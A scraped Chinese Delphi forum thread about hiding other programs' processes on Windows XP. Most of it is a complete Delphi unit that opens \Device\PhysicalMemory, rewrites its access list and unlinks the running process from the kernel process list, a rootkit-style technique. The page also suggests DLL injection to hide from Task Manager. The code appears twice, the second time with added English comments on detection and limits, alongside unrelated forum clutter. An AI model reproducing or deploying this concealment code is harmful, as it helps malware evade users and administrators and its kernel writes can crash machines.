用delphi 写个隐藏其它程序的工具 本帖最后由 zhangqiwen 于 2009-06-26 02:07:44 编辑 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 这些方法好像确实跟系统有关。网上常见的方法都是针对win2000以上版本的,win98的方法有差别,虽然现在win98用的人少了,但是如果你真的要考虑这一块,建议在程序前加段代码,用来判断系统的版本,然后再调用不同的方法来操作 你说的那个隐藏进程应该是改EProcess的双向链表实现的吧?微软没有公开EProcess的结构,各个系统之间的EProcess结构也可能有差别,所以这个方法并不通用。如果只是在任务管理器当中隐藏,DLL注入就行了,不用费这么大力气 有例子吗? 网上流传的那个pas文件在有的电脑确实能隐藏(同为xp,有的不行), 我就是把他包含到dll文件注入目标的. 另外我只需要在xp系统下能隐藏就可以了.我下了些其它隐藏进程的工具,发现都能用....我试的不能隐藏的,它也行. unit HideProcess;interfacefunction MyHideProcess: Boolean;implementationuses Windows, Classes, AclAPI, accCtrl;type NTSTATUS = LongInt;const //NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004); STATUS_ACCESS_DENIED = NTSTATUS($C0000022); OBJ_INHERIT = $00000002; OBJ_PERMANENT = $00000010; OBJ_EXCLUSIVE = $00000020; OBJ_CASE_INSENSITIVE = $00000040; OBJ_OPENIF = $00000080; OBJ_OPENLINK = $00000100; OBJ_KERNEL_HANDLE = $00000200; OBJ_VALID_ATTRIBUTES = $000003F2;type PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK; IO_STATUS_BLOCK = record Status: NTSTATUS; FObject: DWORD; end; PUNICODE_STRING = ^UNICODE_STRING; UNICODE_STRING = record Length: Word; MaximumLength: Word; Buffer: PWideChar; end; POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES; OBJECT_ATTRIBUTES = record Length: DWORD; RootDirectory: Pointer; ObjectName: PUNICODE_STRING; Attributes: DWORD; SecurityDescriptor: Pointer; SecurityQualityOfService: Pointer; end; TZwOpenSection = function(SectionHandle: PHandle; DesiredAccess: ACCESS_MASK; ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall; TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING; SourceString: PWideChar); stdcall;var RtlInitUnicodeString: TRTLINITUNICODESTRING = nil; ZwOpenSection: TZwOpenSection = nil; g_hNtDLL: THandle = 0; g_pMapPhysicalMemory: Pointer = nil; g_hMPM: THandle = 0; g_hMPM2: THandle = 0; g_osvi: OSVERSIONINFO; b_hide: Boolean = false; //---------------------------------------------------------------------------function InitNTDLL: 
Boolean;begin g_hNtDLL := LoadLibrary('ntdll.dll'); if 0 = g_hNtDLL then begin Result := false; Exit; end; RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString'); ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection'); Result := True;end;//---------------------------------------------------------------------------procedure CloseNTDLL;begin if (0 <> g_hNtDLL) then FreeLibrary(g_hNtDLL); g_hNtDLL := 0;end;//---------------------------------------------------------------------------procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);var pDacl: PACL; pSD: PPSECURITY_DESCRIPTOR; pNewDacl: PACL; dwRes: DWORD; ea: EXPLICIT_ACCESS;begin pDacl := nil; pSD := nil; pNewDacl := nil; dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD); if ERROR_SUCCESS <> dwRes then begin if Assigned(pSD) then LocalFree(Hlocal(pSD^)); if Assigned(pNewDacl) then LocalFree(Hlocal(pNewDacl)); end; ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions := SECTION_MAP_WRITE; ea.grfAccessMode := GRANT_ACCESS; ea.grfInheritance := NO_INHERITANCE; ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME; ea.Trustee.TrusteeType := TRUSTEE_IS_USER; ea.Trustee.ptstrName := 'CURRENT_USER'; dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl); if ERROR_SUCCESS <> dwRes then begin if Assigned(pSD) then LocalFree(Hlocal(pSD^)); if Assigned(pNewDacl) then LocalFree(Hlocal(pNewDacl)); end; dwRes := SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil); if ERROR_SUCCESS <> dwRes then begin if Assigned(pSD) then LocalFree(Hlocal(pSD^)); if Assigned(pNewDacl) then LocalFree(Hlocal(pNewDacl)); end;end;//---------------------------------------------------------------------------function OpenPhysicalMemory: THandle;var Status: NTSTATUS; physmemString: UNICODE_STRING; Attributes: OBJECT_ATTRIBUTES; PhyDirectory: DWORD;begin g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO); 
GetVersionEx(g_osvi); if (5 <> g_osvi.dwMajorVersion) then begin Result := 0; Exit; end; case g_osvi.dwMinorVersion of 0: PhyDirectory := $30000; 1: PhyDirectory := $39000; else begin Result := 0; Exit; end; end; RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory'); Attributes.Length := sizeof(OBJECT_ATTRIBUTES); Attributes.RootDirectory := nil; Attributes.ObjectName := @physmemString; Attributes.Attributes := 0; Attributes.SecurityDescriptor := nil; Attributes.SecurityQualityOfService := nil; Status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @Attributes); if (Status = STATUS_ACCESS_DENIED) then begin ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @Attributes); SetPhyscialMemorySectionCanBeWrited(g_hMPM); CloseHandle(g_hMPM); Status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @Attributes); end; if not (LongInt(Status) >= 0) then begin Result := 0; Exit; end; g_pMapPhysicalMemory := MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000); if (g_pMapPhysicalMemory = nil) then begin Result := 0; Exit; end; Result := g_hMPM;end;//---------------------------------------------------------------------------function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;var VAddr, PGDE, PTE, PAddr, tmp: DWORD;begin VAddr := DWORD(addr); // PGDE := BaseAddress[VAddr shr 22]; PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * sizeof(ULONG))^; // modify by dot. if 0 = (PGDE and 1) then begin Result := nil; Exit; end; tmp := PGDE and $00000080; if (0 <> tmp) then begin PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF); end else begin PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000)); // PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12]; PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * sizeof(DWORD))^; // modify by dot. 
if (0 = (PTE and 1)) then begin Result := nil; Exit; end; PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF); UnmapViewOfFile(Pointer(PGDE)); end; Result := Pointer(PAddr);end;//---------------------------------------------------------------------------function GetData(addr: Pointer): DWORD;var phys, ret: DWORD; tmp: PDWORD;begin phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr))); tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000)); if (nil = tmp) then begin Result := 0; Exit; end; // ret := tmp[(phys and $FFF) shr 2]; ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * sizeof(DWORD))^; // modify by dot. UnmapViewOfFile(tmp); Result := ret;end;//---------------------------------------------------------------------------function SetData(addr: Pointer; data: DWORD): Boolean;var phys: DWORD; tmp: PDWORD;begin phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr))); tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000)); if (nil = tmp) then begin Result := false; Exit; end; // tmp[(phys and $FFF) shr 2] := data; PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * sizeof(DWORD))^ := data; // modify by dot. 
UnmapViewOfFile(tmp); Result := True;end;//---------------------------------------------------------------------------{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)beginExitProcess(0);return 1 ;end }//---------------------------------------------------------------------------function YHideProcess: Boolean;var thread, process: DWORD; fw, bw: DWORD;begin // SetUnhandledExceptionFilter(exeception); if (false = InitNTDLL) then begin Result := false; Exit; end; if (0 = OpenPhysicalMemory) then begin Result := false; Exit; end; thread := GetData(Pointer($FFDFF124)); //kteb process := GetData(Pointer(thread + $44)); //kpeb if (0 = g_osvi.dwMinorVersion) then begin fw := GetData(Pointer(process + $A0)); bw := GetData(Pointer(process + $A4)); SetData(Pointer(fw + 4), bw); SetData(Pointer(bw), fw); Result := True; end else if (1 = g_osvi.dwMinorVersion) then begin fw := GetData(Pointer(process + $88)); bw := GetData(Pointer(process + $8C)); SetData(Pointer(fw + 4), bw); SetData(Pointer(bw), fw); Result := True; end else begin Result := false; end; CloseHandle(g_hMPM); CloseNTDLL;end;function MyHideProcess: Boolean;begin if not b_hide then begin b_hide := YHideProcess; end; Result := b_hide;end;end. 上面那个就是改EProcess实现的,EProcess结构不同,XP SP2的偏移是$88和$8C,其他的版本就不清楚了 那是因为EProcess各个版本中的结构不同,XP SP2的偏移就是上面,但其他版本不同,必须自己调试得到偏移地址 OD不行,这个需要用到内核级调试器,比如WinDBG,具体用法网上有很多资料可以参考 下载个winopertor窗口手术师研究一下. delete * from AA 怎么回事哦 切忌浮躁。看delphi自带的pas文件。问2个函数。 対文件中的数据進行「Group by」 错误信息 求教,如何动态修改access数据库的表结构? 關于開啟子窗口的問題(代碼如下)﹐報錯 一个关于MIDAS的菜鸟问题,为何无法写入? 用ADO连接数据库 Delphi参数问题 delphi程序员薪水大公开 菜鸟虚心请教,关于发送封包问题,请各位赐教!!!!!谢谢!!! delphi 读取指针数组的数据问题
如果只是在任务管理器当中隐藏,DLL注入就行了,不用费这么大力气
有例子吗? 网上流传的那个pas文件在有的电脑上确实能隐藏(同为xp,有的不行),我就是把它包含到dll文件里再注入目标进程的。另外我只需要在xp系统下能隐藏就可以了。我下了些其它隐藏进程的工具,发现都能用……在我试过、无法隐藏的那些机器上,它们也行。
Windows,
Classes, AclAPI, accCtrl;type
// NTSTATUS is a signed 32-bit status code; a negative value means failure
// (see the NT_SUCCESS macro quoted below).
NTSTATUS = LongInt;const
//NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
// OBJECT_ATTRIBUTES.Attributes flags mirrored from the native API.
// The code in this unit passes Attributes := 0, so they are declared but unused.
OBJ_INHERIT = $00000002;
OBJ_PERMANENT = $00000010;
OBJ_EXCLUSIVE = $00000020;
OBJ_CASE_INSENSITIVE = $00000040;
OBJ_OPENIF = $00000080;
OBJ_OPENLINK = $00000100;
OBJ_KERNEL_HANDLE = $00000200;
OBJ_VALID_ATTRIBUTES = $000003F2;type
// Minimal native-API record definitions that the Delphi Windows unit lacks.
// IO_STATUS_BLOCK is not referenced elsewhere in this unit.
PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
IO_STATUS_BLOCK = record
Status: NTSTATUS;
FObject: DWORD;
end; PUNICODE_STRING = ^UNICODE_STRING;
UNICODE_STRING = record
Length: Word;
MaximumLength: Word;
Buffer: PWideChar;
end; POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
OBJECT_ATTRIBUTES = record
Length: DWORD;
RootDirectory: Pointer;
ObjectName: PUNICODE_STRING;
Attributes: DWORD;
SecurityDescriptor: Pointer;
SecurityQualityOfService: Pointer;
end;
// Prototypes of the two ntdll exports resolved at run time by InitNTDLL.
TZwOpenSection = function(SectionHandle: PHandle;
DesiredAccess: ACCESS_MASK;
ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
SourceString: PWideChar); stdcall;var
// Filled by InitNTDLL via GetProcAddress; nil until then.
RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
ZwOpenSection: TZwOpenSection = nil;
g_hNtDLL: THandle = 0;
// View of one page of the kernel page directory, mapped by OpenPhysicalMemory.
g_pMapPhysicalMemory: Pointer = nil;
// Section handle for \Device\PhysicalMemory, opened by OpenPhysicalMemory.
g_hMPM: THandle = 0;
// Declared but never used in this unit.
g_hMPM2: THandle = 0;
// Filled by GetVersionEx in OpenPhysicalMemory; the minor version selects
// the hard-coded page-directory address and the EPROCESS list offsets.
g_osvi: OSVERSIONINFO;
// Latched to True once YHideProcess has succeeded (see MyHideProcess).
b_hide: Boolean = false;
//---------------------------------------------------------------------------
// Loads ntdll.dll and resolves the two exports this unit calls
// (RtlInitUnicodeString, ZwOpenSection).
// Returns False only when LoadLibrary fails; the GetProcAddress results
// are stored without being checked.
function InitNTDLL: Boolean;
begin
g_hNtDLL := LoadLibrary('ntdll.dll');
if 0 = g_hNtDLL then
begin
Result := false;
Exit;
end;
RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection');
Result := True;
end;
//---------------------------------------------------------------------------
// Releases the ntdll.dll module handle taken by InitNTDLL and resets it to 0.
procedure CloseNTDLL;
begin
if (0 <> g_hNtDLL) then
FreeLibrary(g_hNtDLL);
g_hNtDLL := 0;
end;
//---------------------------------------------------------------------------
// Rewrites the DACL of the given section object so that the trustee named
// 'CURRENT_USER' is granted SECTION_MAP_WRITE. The caller passes a handle
// opened with READ_CONTROL or WRITE_DAC, which only an administrator can
// obtain on \Device\PhysicalMemory - the whole technique therefore depends
// on the caller already running with administrative rights (least-privilege
// accounts stop it here). On Windows Server 2003 SP1 and later releases
// user-mode opens of \Device\PhysicalMemory are refused regardless of the
// DACL, so this procedure has no effect there.
// The procedure has no return value: on each API failure it frees what was
// allocated and continues; the caller is not told whether the DACL changed.
procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
var
pDacl: PACL;
pSD: PPSECURITY_DESCRIPTOR;
pNewDacl: PACL;
dwRes: DWORD;
ea: EXPLICIT_ACCESS;
begin
pDacl := nil;
pSD := nil;
pNewDacl := nil;
// Read the current DACL (pDacl points into the buffer returned in pSD).
dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);
if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(Hlocal(pNewDacl));
end;
// Build one explicit-access entry: grant SECTION_MAP_WRITE to CURRENT_USER.
ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions := SECTION_MAP_WRITE;
ea.grfAccessMode := GRANT_ACCESS;
ea.grfInheritance := NO_INHERITANCE;
ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
ea.Trustee.ptstrName := 'CURRENT_USER';
// Merge the new entry with the existing DACL into pNewDacl.
dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);
if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(Hlocal(pNewDacl));
end;
// Write the merged DACL back onto the section object. A DACL change on this
// object is a strong audit/detection signal for defenders.
dwRes := SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);
if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(Hlocal(pNewDacl));
end;
end;
//---------------------------------------------------------------------------
// Opens the \Device\PhysicalMemory section for read/write and maps one page
// of the kernel page directory into g_pMapPhysicalMemory.
// Returns the section handle (also stored in g_hMPM), or 0 on any failure.
// Only Windows major version 5 with minor version 0 or 1 is accepted; the
// physical address of the page directory is hard-coded per minor version
// rather than looked up, so the function only works on installs where that
// assumption happens to hold - consistent with the thread's report that the
// same file hides on some XP machines and not on others.
// Any user-mode open of \Device\PhysicalMemory is a useful detection signal;
// on Windows Server 2003 SP1 and later releases such opens are refused.
function OpenPhysicalMemory: THandle;
var
Status: NTSTATUS;
physmemString: UNICODE_STRING;
Attributes: OBJECT_ATTRIBUTES;
PhyDirectory: DWORD;
begin
g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);
GetVersionEx(g_osvi);
if (5 <> g_osvi.dwMajorVersion) then
begin
Result := 0;
Exit;
end;
// Hard-coded physical address of the page directory for the two supported
// minor versions; anything else is rejected.
case g_osvi.dwMinorVersion of
0: PhyDirectory := $30000;
1: PhyDirectory := $39000;
else
begin
Result := 0;
Exit;
end;
end;
RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');
Attributes.Length := sizeof(OBJECT_ATTRIBUTES);
Attributes.RootDirectory := nil;
Attributes.ObjectName := @physmemString;
Attributes.Attributes := 0;
Attributes.SecurityDescriptor := nil;
Attributes.SecurityQualityOfService := nil;
Status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @Attributes);
// If write access is denied, reopen with WRITE_DAC (administrator only),
// loosen the DACL, and retry. The DACL change persists on the object.
if (Status = STATUS_ACCESS_DENIED) then
begin
ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @Attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
Status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @Attributes);
end;
// NT_SUCCESS: a negative status is a failure.
if not (LongInt(Status) >= 0) then
begin
Result := 0;
Exit;
end;
// Map one $1000-byte page at the page-directory offset; this view is what
// LinearToPhys walks later.
g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);
if (g_pMapPhysicalMemory = nil) then
begin
Result := 0;
Exit;
end;
Result := g_hMPM;
end;
//---------------------------------------------------------------------------
// Translates a 32-bit virtual address to a physical address by walking the
// two-level x86 page tables through the \Device\PhysicalMemory section.
// BaseAddress is the mapped page directory (g_pMapPhysicalMemory); addr is
// the virtual address to translate. Returns nil when the directory or table
// entry is not present. Only a two-level, 4 KB/4 MB page layout is handled.
function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;
var
VAddr, PGDE, PTE, PAddr, tmp: DWORD;
begin
VAddr := DWORD(addr);
// Page-directory entry: top 10 bits of the address index the directory.
// PGDE := BaseAddress[VAddr shr 22];
PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * sizeof(ULONG))^; // modify by dot.
// Bit 0 = present.
if 0 = (PGDE and 1) then
begin
Result := nil;
Exit;
end;
// Bit 7 = page size; set means a 4 MB page, no page table to consult.
tmp := PGDE and $00000080;
if (0 <> tmp) then
begin
PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);
end
else
begin
// Map the page table itself (4 = FILE_MAP_READ) and read the entry
// selected by the middle 10 address bits.
PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));
// PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];
PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * sizeof(DWORD))^; // modify by dot.
if (0 = (PTE and 1)) then
begin
Result := nil;
Exit;
end;
PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);
UnmapViewOfFile(Pointer(PGDE));
end;
Result := Pointer(PAddr);
end;
//---------------------------------------------------------------------------
// Reads one DWORD at kernel virtual address addr: translates it to a
// physical address, maps the containing page through g_hMPM, reads the
// value and unmaps. Returns 0 when the page cannot be mapped - callers
// cannot tell that from a genuine 0 in memory.
function GetData(addr: Pointer): DWORD;
var
phys, ret: DWORD;
tmp: PDWORD;
begin
phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,
phys and $FFFFF000, $1000));
if (nil = tmp) then
begin
Result := 0;
Exit;
end;
// Index the DWORD within the mapped page by the low 12 bits of phys.
// ret := tmp[(phys and $FFF) shr 2];
ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * sizeof(DWORD))^; // modify by dot.
UnmapViewOfFile(tmp);
Result := ret;
end;
//---------------------------------------------------------------------------
// Writes one DWORD (data) at kernel virtual address addr through the
// physical-memory section, mirroring GetData. Returns False when the page
// cannot be mapped, True after the write. There is no verification that
// addr is what the caller thinks it is: a wrong address corrupts kernel
// memory, which on a mismatched build typically ends in a bugcheck.
function SetData(addr: Pointer; data: DWORD): Boolean;
var
phys: DWORD;
tmp: PDWORD;
begin
phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));
if (nil = tmp) then
begin
Result := false;
Exit;
end;
// tmp[(phys and $FFF) shr 2] := data;
PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * sizeof(DWORD))^ := data; // modify by dot.
UnmapViewOfFile(tmp);
Result := True;
end;
//---------------------------------------------------------------------------
{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
begin
ExitProcess(0);
return 1 ;
end }
//---------------------------------------------------------------------------
// Unlinks the calling process from the kernel's process list (the technique
// the thread describes as "modifying the EPROCESS doubly-linked list").
// Steps, all through the \Device\PhysicalMemory section:
//   1. read the current thread block pointer from the fixed address
//      $FFDFF124 (commented "kteb" by the author);
//   2. read the owning process block at thread + $44 ("kpeb");
//   3. read the process's forward/backward list pointers at a per-build
//      offset ($A0/$A4 for minor version 0, $88/$8C for minor version 1 -
//      the thread says the latter are XP SP2's) and point the neighbours
//      at each other.
// Returns True after the two writes, False if setup fails or the minor
// version is neither 0 nor 1. Note that after the unlink the process still
// owns a PID, handles and running threads: only enumerations that walk this
// list stop showing it, so cross-view comparison (list walk versus
// PID/handle-table or per-thread enumeration) exposes it, and an unlinked
// process is itself an indicator of kernel-object tampering. The offsets
// are build-specific; on any other build step 3 writes to arbitrary kernel
// memory.
// The author's commented-out exception filter (above) is not installed.
function YHideProcess: Boolean;
var
thread, process: DWORD;
fw, bw: DWORD;
begin
// SetUnhandledExceptionFilter(exeception);
if (false = InitNTDLL) then
begin
Result := false;
Exit;
end;
if (0 = OpenPhysicalMemory) then
begin
Result := false;
Exit;
end;
thread := GetData(Pointer($FFDFF124)); //kteb
process := GetData(Pointer(thread + $44)); //kpeb
if (0 = g_osvi.dwMinorVersion) then
begin
fw := GetData(Pointer(process + $A0));
bw := GetData(Pointer(process + $A4));
// Neighbour after us gets our predecessor as its backward link,
// neighbour before us gets our successor as its forward link.
SetData(Pointer(fw + 4), bw);
SetData(Pointer(bw), fw);
Result := True;
end
else if (1 = g_osvi.dwMinorVersion) then
begin
fw := GetData(Pointer(process + $88));
bw := GetData(Pointer(process + $8C));
SetData(Pointer(fw + 4), bw);
SetData(Pointer(bw), fw);
Result := True;
end
else
begin
Result := false;
end;
// The section handle is closed here; the page-directory view in
// g_pMapPhysicalMemory is left mapped.
CloseHandle(g_hMPM);
CloseNTDLL;
end;
//---------------------------------------------------------------------------
// Public entry point (declared in the interface section). Runs YHideProcess
// at most once successfully: b_hide latches True on success, so later calls
// return the cached result; a failed attempt leaves b_hide False and is
// retried on the next call.
function MyHideProcess: Boolean;
begin
if not b_hide then
begin
b_hide := YHideProcess;
end;
Result := b_hide;
end;
end.